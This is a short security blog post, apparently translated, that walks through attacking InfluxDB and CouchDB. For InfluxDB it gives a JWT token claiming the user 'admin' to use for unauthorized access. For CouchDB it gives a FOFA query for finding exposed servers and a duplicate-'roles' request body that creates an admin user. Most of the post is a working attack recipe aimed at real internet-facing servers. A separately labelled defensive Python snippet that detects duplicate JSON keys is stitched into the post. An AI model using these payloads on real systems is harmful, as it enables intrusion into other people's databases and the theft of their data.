Influxdb unauthorized access & CouchDB permission bypass
2022-07-24 07:26:00 【Boring knowledge】

InfluxDB - Unauthorized access
Default ports: 8086, 8088
Use https://jwt.io/ to generate a JWT token:



Capture the request when logging in
Then add the following header to the request:
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJpYXQiOjE2NzEyNTIxMjN9.Y9i99OpSWOInZqmBpQAvr2ymmsWG2dZZDYkz9RzrCk0

At this point you can query the data

CouchDB - Permission bypass
You can try a FOFA search
The corresponding version should not be higher than 1.7.0
"CouchDB" && port="5984"
Unauthorized access
Append the following to the address:
_utils/#


There is also another method, which requires capturing a request
Two things need to be added to the request:

/_users/org.couchdb.user:vulhub
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "123456"
}
When you send the request and see an OK in the response,
you may have successfully added the user.
You can then try to log in.
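A defensive view of the request body above, as an added example that is not part of the original post: the body carries the "roles" key twice, so a parser that keeps the first value and one that keeps the last disagree about the user's roles. The function names are hypothetical and the sample body is constructed from the one shown above; the check flags such bodies, for instance in a proxy filter or during log review.

```python
import json

# Constructed sample: the request body from the post (note the repeated "roles" key).
SAMPLE_BODY = """{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "123456"
}"""

def find_duplicate_keys(body):
    """Return keys that occur more than once within a single JSON object, at any depth."""
    duplicates = []

    def hook(pairs):
        seen = {}
        for key, value in pairs:
            if key in seen:
                duplicates.append(key)
            seen[key] = value
        return seen

    json.loads(body, object_pairs_hook=hook)
    return duplicates

def parser_views(body):
    """Parse the same text twice: keeping the first value per key, then the last."""
    # dict() keeps the last pair it sees, so reversing the pairs makes the first one win.
    first = json.loads(body, object_pairs_hook=lambda pairs: dict(reversed(pairs)))
    last = json.loads(body)  # Python's json module keeps the last value
    return first, last

def review_user_doc(body):
    """Hypothetical pre-filter verdict for a body sent to /_users/."""
    try:
        dups = find_duplicate_keys(body)
    except json.JSONDecodeError:
        return "reject: not valid JSON"
    if dups:
        return "reject: duplicate keys " + ", ".join(sorted(set(dups)))
    return "pass"

if __name__ == "__main__":
    first, last = parser_views(SAMPLE_BODY)
    print("first-wins roles:", first["roles"])
    print("last-wins roles: ", last["roles"])
    print(review_user_doc(SAMPLE_BODY))
```

Rejecting any object with repeated keys removes the ambiguity regardless of which value a downstream parser would have picked.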
